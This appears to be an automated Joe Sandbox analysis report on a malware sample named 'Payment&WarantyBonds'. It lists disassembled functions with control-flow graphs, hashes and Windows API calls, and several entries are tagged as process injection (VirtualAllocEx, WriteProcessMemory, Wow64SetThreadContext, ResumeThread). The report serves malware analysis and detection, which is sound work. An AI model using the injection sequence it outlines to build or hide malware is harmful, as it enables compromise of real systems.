                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0B153B16
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                • Opcode ID: 4938411b29cf3fa9be4a4768f771eb3f162133c6eaf484a53ae0869bf8a20691
                                                                                                                                                                                • Instruction ID: 21c5893844036db31ae85e4b8d6a265bc84362cdb03d25138218b62c96adafa3
                                                                                                                                                                                • Opcode Fuzzy Hash: 4938411b29cf3fa9be4a4768f771eb3f162133c6eaf484a53ae0869bf8a20691
                                                                                                                                                                                • Instruction Fuzzy Hash: 79916A71D00219DFDB20CFA8D8417EDBBB2FF48310F1485AAE869A7240DB749985CF96
                                                                                                                                                                                Function 0284AD88 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 786 284ad88-284ad97 787 284adc3-284adc7 786->787 788 284ad99-284ada6 call 284a100 786->788 790 284adc9-284add3 787->790 791 284addb-284ae1c 787->791 793 284adbc 788->793 794 284ada8 788->794 790->791 797 284ae1e-284ae26 791->797 798 284ae29-284ae37 791->798 793->787 841 284adae call 284b020 794->841 842 284adae call 284b011 794->842 797->798 799 284ae39-284ae3e 798->799 800 284ae5b-284ae5d 798->800 802 284ae40-284ae47 call 284a10c 799->802 803 284ae49 799->803 805 284ae60-284ae67 800->805 801 284adb4-284adb6 801->793 804 284aef8-284afb8 801->804 807 284ae4b-284ae59 802->807 803->807 836 284afc0-284afeb GetModuleHandleW 804->836 837 284afba-284afbd 804->837 808 284ae74-284ae7b 805->808 809 284ae69-284ae71 805->809 807->805 811 284ae7d-284ae85 808->811 812 284ae88-284ae91 call 284a11c 808->812 809->808 811->812 817 284ae93-284ae9b 812->817 818 284ae9e-284aea3 812->818 817->818 819 284aea5-284aeac 818->819 820 284aec1-284aece 818->820 819->820 822 284aeae-284aebe call 284a12c call 284a13c 819->822 827 284aed0-284aeee 820->827 828 284aef1-284aef7 820->828 822->820 827->828 838 284aff4-284b008 836->838 839 284afed-284aff3 836->839 837->836 839->838 841->801 842->801
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0284AFDE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746749603.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2840000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                • Opcode ID: 5008c2c6bfa95cca926149961fe4a9e35d99f60729f4407edf37a3e443f21590
                                                                                                                                                                                • Instruction ID: 752ea1a5eaca33240b2ca184cac5eaa10ab74d7be2554b7c33d303751083e29a
                                                                                                                                                                                • Opcode Fuzzy Hash: 5008c2c6bfa95cca926149961fe4a9e35d99f60729f4407edf37a3e443f21590
                                                                                                                                                                                • Instruction Fuzzy Hash: A3714678A00B098FD728DF2AD05475ABBF1FF88704F008A2DD49ADBA50DB35E945CB91
                                                                                                                                                                                Function 0284590D Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 951 284590d-284598c 952 284598f-28459d9 CreateActCtxA 951->952 954 28459e2-2845a3c 952->954 955 28459db-28459e1 952->955 962 2845a3e-2845a41 954->962 963 2845a4b-2845a4f 954->963 955->954 962->963 964 2845a60-2845a90 963->964 965 2845a51-2845a5d 963->965 969 2845a42 964->969 970 2845a92-2845b14 964->970 965->964 972 2845a46 969->972 973 2845a47 972->973 973->963
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 028459C9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746749603.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2840000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                • Opcode ID: f485680ef2ea2d1018d40043592080ffd9b5806b82b27841da5533a0b9a368b5
                                                                                                                                                                                • Instruction ID: 8da7132becaf6ae8552758d4a23306b61949ebfaa4e7d7195ca724c8162d3c8d
                                                                                                                                                                                • Opcode Fuzzy Hash: f485680ef2ea2d1018d40043592080ffd9b5806b82b27841da5533a0b9a368b5
                                                                                                                                                                                • Instruction Fuzzy Hash: D341E3B4C0061DCBDB14CFA9C8847DEBBB5BF49304F60816AD408AB251DB79594ACF90
                                                                                                                                                                                Function 028444E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 974 28444e4-28459d9 CreateActCtxA 978 28459e2-2845a3c 974->978 979 28459db-28459e1 974->979 986 2845a3e-2845a41 978->986 987 2845a4b-2845a4f 978->987 979->978 986->987 988 2845a60-2845a90 987->988 989 2845a51-2845a5d 987->989 993 2845a42-2845a47 988->993 994 2845a92-2845b14 988->994 989->988 993->987
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 028459C9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746749603.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2840000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                • Opcode ID: ed3969747f601927c0aaee85cdb75a136a5bcb5b92883283e2a08500046248ce
                                                                                                                                                                                • Instruction ID: c19456312666f09d07b17af65e974821c2fe256d318296cf609b8f200cb91b13
                                                                                                                                                                                • Opcode Fuzzy Hash: ed3969747f601927c0aaee85cdb75a136a5bcb5b92883283e2a08500046248ce
                                                                                                                                                                                • Instruction Fuzzy Hash: 1B41E3B4C0071DCBDB24DFA9C944B9EBBB5BF48304F64805AD408AB255DB75694ACF90
                                                                                                                                                                                Function 02845A84 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 998 2845a84-2845a90 999 2845a42 998->999 1000 2845a92-2845b14 998->1000 1002 2845a46 999->1002 1003 2845a47 1002->1003 1004 2845a4b-2845a4f 1003->1004 1005 2845a60-2845a61 1004->1005 1006 2845a51-2845a5d 1004->1006 1005->998 1006->1005
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746749603.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2840000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dc5e1c90e6080b90a2151ee88804d21964ef028284b655cc2a5208c25802486e
                                                                                                                                                                                • Instruction ID: d3c8e372e0288806a24899514bb8916cce8ddcc102ed814d356c4dc3772231e4
                                                                                                                                                                                • Opcode Fuzzy Hash: dc5e1c90e6080b90a2151ee88804d21964ef028284b655cc2a5208c25802486e
                                                                                                                                                                                • Instruction Fuzzy Hash: 7131CF7880424DCFEF00DFA8C89479DBFF0AF56318F54418AC419AB2A5DB79A94ACB41
                                                                                                                                                                                Function 0B153651 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0B1536E8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                • Opcode ID: 3b2e61d98b2431087c8d1ce48e540c774446c722c4cbe48b8368958db1d2dbf1
                                                                                                                                                                                • Instruction ID: 414659c751056dcc2862e65d9e035e8c93bad5210ca49c47f618c0051c23902c
                                                                                                                                                                                • Opcode Fuzzy Hash: 3b2e61d98b2431087c8d1ce48e540c774446c722c4cbe48b8368958db1d2dbf1
                                                                                                                                                                                • Instruction Fuzzy Hash: 422146B5900319DFCB10CFA9D985BDEBBF5FF48310F10842AE969A7240D7789944CBA4
                                                                                                                                                                                Function 0B153658 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0B1536E8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                • Opcode ID: 8e9aa36b26a2cf302b40774ab33089921ef533d8fcfc9d46ad9acd62bef23a75
                                                                                                                                                                                • Instruction ID: 06b612474cf753279edce5c36549ace98c314c74c8e05ff8dd23a4fd4c2a3d09
                                                                                                                                                                                • Opcode Fuzzy Hash: 8e9aa36b26a2cf302b40774ab33089921ef533d8fcfc9d46ad9acd62bef23a75
                                                                                                                                                                                • Instruction Fuzzy Hash: C82144B1900309DFCB10CFAAC985BDEBBF5FF48310F10842AE969A7240C7789944CBA4
                                                                                                                                                                                Function 0B153740 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0B1537C8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                • Opcode ID: 846775464b1cdc1b25fdc55a2fefef29058f3cb686ee870c513dce0d1e7123fb
                                                                                                                                                                                • Instruction ID: ed59fb0e707cb3295bf2a06727d4f3ed097ec93ebeee8d78aafc4795cd711569
                                                                                                                                                                                • Opcode Fuzzy Hash: 846775464b1cdc1b25fdc55a2fefef29058f3cb686ee870c513dce0d1e7123fb
                                                                                                                                                                                • Instruction Fuzzy Hash: BD2139B5900259DFCB10CFAAD945AEEFBF5FF48320F10842AE559A7250D7349540CBA4
                                                                                                                                                                                Function 0B1534B8 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0B15353E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                • Opcode ID: 1310debafe350e94f29ba90ab7200df7f9a5a4733e685c480f76f5b6312e456c
                                                                                                                                                                                • Instruction ID: b74c697feec0d15835926b9582960e4ecf01863c8275e239247d5a9da2770b36
                                                                                                                                                                                • Opcode Fuzzy Hash: 1310debafe350e94f29ba90ab7200df7f9a5a4733e685c480f76f5b6312e456c
                                                                                                                                                                                • Instruction Fuzzy Hash: E32159B1900309CFDB10DFAAC4857EEFBF4AF48324F10842AD459A7240C7789984CFA5
                                                                                                                                                                                Function 0B153748 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0B1537C8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                • Opcode ID: ba6a24f6d35e419e99e42c758f873132faf9ce33b91e2f2e11e9a387a0acc5fe
                                                                                                                                                                                • Instruction ID: 04d3e67d1fc3080f3e6683efbda70c24f599c128f513fb612c69d222f79c47c5
                                                                                                                                                                                • Opcode Fuzzy Hash: ba6a24f6d35e419e99e42c758f873132faf9ce33b91e2f2e11e9a387a0acc5fe
                                                                                                                                                                                • Instruction Fuzzy Hash: 962116B1900259DFCB10DFAAC985AEEFBF5FF48310F10882AE959A7250C7349544CBA4
                                                                                                                                                                                Function 0B1534C0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0B15353E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                • Opcode ID: 29c6a22dacaf13b43cc87b51f4fd96942e02ede3cfda347c4c3fa0152bc644bd
                                                                                                                                                                                • Instruction ID: d66ddbe62898d0090efb471bc8dc6c8ec825aeb832037df820c9a42350806f53
                                                                                                                                                                                • Opcode Fuzzy Hash: 29c6a22dacaf13b43cc87b51f4fd96942e02ede3cfda347c4c3fa0152bc644bd
                                                                                                                                                                                • Instruction Fuzzy Hash: 32213AB1900209CFDB10DFAAC4857EEFBF4EF48354F108429D459A7240C7789584CFA4
                                                                                                                                                                                Function 0284D661 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0284D6EF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746749603.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2840000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                • Opcode ID: bc548a6717459f3a7e785e6ef821f6a84b874e2b2094acb22016fe2e038b2f46
                                                                                                                                                                                • Instruction ID: c0fa03dc64727c5675bf83673c55da42e316c26e0fde927e45a2c84951a9a224
                                                                                                                                                                                • Opcode Fuzzy Hash: bc548a6717459f3a7e785e6ef821f6a84b874e2b2094acb22016fe2e038b2f46
                                                                                                                                                                                • Instruction Fuzzy Hash: 2921E3B59002589FDB10CF99D584ADEBBF4FB48314F14841AE958A7250D374A954CFA4
                                                                                                                                                                                Function 0284D668 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0284D6EF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746749603.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2840000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                • Opcode ID: e175cdc2336f123327641aee4fb09053e23c44787cf0c7ce5b14198e641d27f4
                                                                                                                                                                                • Instruction ID: d90908daa829aed9561a54ed447d063a05ad60b3f2528b8335aea8822f837e10
                                                                                                                                                                                • Opcode Fuzzy Hash: e175cdc2336f123327641aee4fb09053e23c44787cf0c7ce5b14198e641d27f4
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C21C4B5900258DFDB10CF9AD984ADEFBF4FB48310F14841AE958A7350D374A954CFA5
                                                                                                                                                                                Function 0B153590 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0B153606
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                • Opcode ID: 39865478e13c91eb5c68c38537cffdd33326b7da6d07fd2f349dd7db59034a92
                                                                                                                                                                                • Instruction ID: 5473aa67175eef6a202c43b5da07aa2a5d6f0931885cddf5188452dd37bfd121
                                                                                                                                                                                • Opcode Fuzzy Hash: 39865478e13c91eb5c68c38537cffdd33326b7da6d07fd2f349dd7db59034a92
                                                                                                                                                                                • Instruction Fuzzy Hash: 5D1147B1900248DFCB10DFA9C8457DEBFF5AF48320F108819E955A7250C7359540CBA5
                                                                                                                                                                                Function 0B153408 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                • Opcode ID: bd7ce5b58c183104ff3d9af001e2f85f438dba48a5019ac40571638fcb898940
                                                                                                                                                                                • Instruction ID: 0647117916a88573c6b7c89cd0a35315387175171a93ce302083c6343fbcc9bf
                                                                                                                                                                                • Opcode Fuzzy Hash: bd7ce5b58c183104ff3d9af001e2f85f438dba48a5019ac40571638fcb898940
                                                                                                                                                                                • Instruction Fuzzy Hash: 221158B1900248CFCB20DFAAD4457EEFBF4EF88324F24842AD459A7250CB74A584CFA5
                                                                                                                                                                                Function 0B153598 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0B153606
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                • Opcode ID: 54ecacbcee78b9a173d386a101373d2d0f3bc02619c2361dbb1c24188ed660f5
                                                                                                                                                                                • Instruction ID: 086fe861b53939a07c7202af6194820bbcb8b626100190bc7d9ebf11788e8d01
                                                                                                                                                                                • Opcode Fuzzy Hash: 54ecacbcee78b9a173d386a101373d2d0f3bc02619c2361dbb1c24188ed660f5
                                                                                                                                                                                • Instruction Fuzzy Hash: 7C1114B1900249DFCB10DFAAD845BDEFFF5AB88320F208819E569A7250C775A554CBA4
                                                                                                                                                                                Function 07302310 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • OutputDebugStringW.KERNELBASE(00000000), ref: 07307798
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugOutputString
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1166629820-0
                                                                                                                                                                                • Opcode ID: 84624f824ce0c30ae729858c70937a18a42dd87926c8c76ea7233c479f942fb1
                                                                                                                                                                                • Instruction ID: e9dc797714d5187b1b97c036a3e2dd5f22748cb79b53ca35b4665a5e22258250
                                                                                                                                                                                • Opcode Fuzzy Hash: 84624f824ce0c30ae729858c70937a18a42dd87926c8c76ea7233c479f942fb1
                                                                                                                                                                                • Instruction Fuzzy Hash: 1C1114B5D00619DBDB10CF9AD548BAEFBF4FB48720F10852AE818A7240D774A940CFE5
                                                                                                                                                                                Function 07307720 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • OutputDebugStringW.KERNELBASE(00000000), ref: 07307798
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugOutputString
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1166629820-0
                                                                                                                                                                                • Opcode ID: 44f3b20c880d3b71103109dea6bb6b6d6e0d6f48a9a237655b7e89ec832b74ab
                                                                                                                                                                                • Instruction ID: 5e1cc3536eedd26b9d6b2bffb625d8c1d24cc055a71b3e6200f3a11e0a129489
                                                                                                                                                                                • Opcode Fuzzy Hash: 44f3b20c880d3b71103109dea6bb6b6d6e0d6f48a9a237655b7e89ec832b74ab
                                                                                                                                                                                • Instruction Fuzzy Hash: BF1153B5D0025ADFCB00CFAAD448BEEFBB0FB48320F20812AE458A7240C334A544CFA4
                                                                                                                                                                                Function 0B153410 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                • Opcode ID: 8d7e94fc1c546ba4d264a2825ce38c2b95493b524bac60be4f173edb7454afc4
                                                                                                                                                                                • Instruction ID: a391da7f1694295f750acc715b5bf2ad3530c46999ab5f6da19a46561026d43c
                                                                                                                                                                                • Opcode Fuzzy Hash: 8d7e94fc1c546ba4d264a2825ce38c2b95493b524bac60be4f173edb7454afc4
                                                                                                                                                                                • Instruction Fuzzy Hash: E3113AB1900248CFCB10DFAAD4457DEFBF4EF88324F208419D459A7250C775A544CFA4
                                                                                                                                                                                Function 0B151D60 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0B155C6D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                • Opcode ID: 186cd21d6198fc1a391fde7f1d7e815f2b6fb5a1e5126a6ca883c4cadf0c0d3d
                                                                                                                                                                                • Instruction ID: 426d79898582de660f3ace755109e413cbf4b733b941581bc711071f8c39b8ec
                                                                                                                                                                                • Opcode Fuzzy Hash: 186cd21d6198fc1a391fde7f1d7e815f2b6fb5a1e5126a6ca883c4cadf0c0d3d
                                                                                                                                                                                • Instruction Fuzzy Hash: C411F5B5900348DFDB10DF99D945BDEFBF8EB58320F108459E954A7210C375A984CFA5
                                                                                                                                                                                Function 0B155C08 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0B155C6D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                • Opcode ID: b01fc4bcdbf4d4ebbb732599013aadf939c578482aa12bdc6faf5e4e7f98ae4b
                                                                                                                                                                                • Instruction ID: ead7de3c95a9e31ef4b38838cb12a6fbf085d9e948d8b8c0773acd9fe59c210a
                                                                                                                                                                                • Opcode Fuzzy Hash: b01fc4bcdbf4d4ebbb732599013aadf939c578482aa12bdc6faf5e4e7f98ae4b
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A1125B5800248DFDB10CF99D989BEEBBF8EB48320F14845AD465A7200C375A584CFA1
                                                                                                                                                                                Function 0284AF78 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
